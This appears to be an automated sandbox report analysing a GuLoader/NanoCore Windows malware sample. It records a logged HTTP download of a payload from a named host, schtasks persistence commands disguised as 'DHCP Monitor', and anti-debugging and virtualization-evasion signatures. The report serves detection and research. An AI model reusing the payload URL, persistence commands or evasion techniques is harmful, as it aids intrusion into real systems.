Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Variant.Razy.845229.13077.24263

Overview

General Information

Sample Name:	SecuriteInfo.com.Variant.Razy.845229.13077.24263 (renamed file extension from 24263 to exe)
Analysis ID:	356594
MD5:	532e58083cf5638b05f617fcbbb5d63b
SHA1:	98058e52de678575ff2327d129a58313af4a3fc0
SHA256:	75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
Tags:	GuLoader
Most interesting Screenshot:

Detection

NanoCore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

SecuriteInfo.com.Variant.Razy.845229.13077.exe (PID: 6184 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' MD5: 532E58083CF5638B05F617FCBBB5D63B)

RegAsm.exe (PID: 5276 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5464 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6536 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegAsm.exe (PID: 6228 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0 MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 4572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 1320 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' , ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 5276, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', ProcessId: 5464

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: mtspsmjeli.sch.id	Virustotal: Detection: 12%			Perma Link
Source: http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	Virustotal: Detection: 15%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	Virustotal: Detection: 32%			Perma Link
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	ReversingLabs: Detection: 36%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Binary contains paths to debug symbols

Show sources

Source:

Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.26.dr

Networking:

Source: Joe Sandbox View

IP Address: 103.150.60.242 103.150.60.242

Source: Joe Sandbox View

ASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID

Source: global traffic

HTTP traffic detected: GET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache

Source: global traffic

Source: unknown

DNS traffic detected: queries for: mtspsmjeli.sch.id

System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00402BF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 31_2_02A201C8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 34_2_00D001C8

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe, 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCompurgato.exe vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe, 00000000.00000002.732287470.00000000020A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	Binary or memory string: OriginalFilenameCompurgato.exe vs SecuriteInfo.com.Variant.Razy.845229.13077.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.evad.winEXE@13/9@7/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4572:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{8b6f465d-30c8-4bc5-bfa5-37d69ca0c565}

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA5C9EF9AD60B9A70.TMP

Jump to behavior

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	Virustotal: Detection: 32%
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Source:

Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.26.dr

Data Obfuscation:

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: real checksum: 0x26551 should be: 0x275bd

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00407E1F push 807BA529h; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00407A97 push 807BC128h; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00405745 push F7686868h; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00405DEC push DD0F66F5h; ret

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F6455 second address: 00000000004F6455 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F3C04 second address: 00000000004F3C04 instructions:

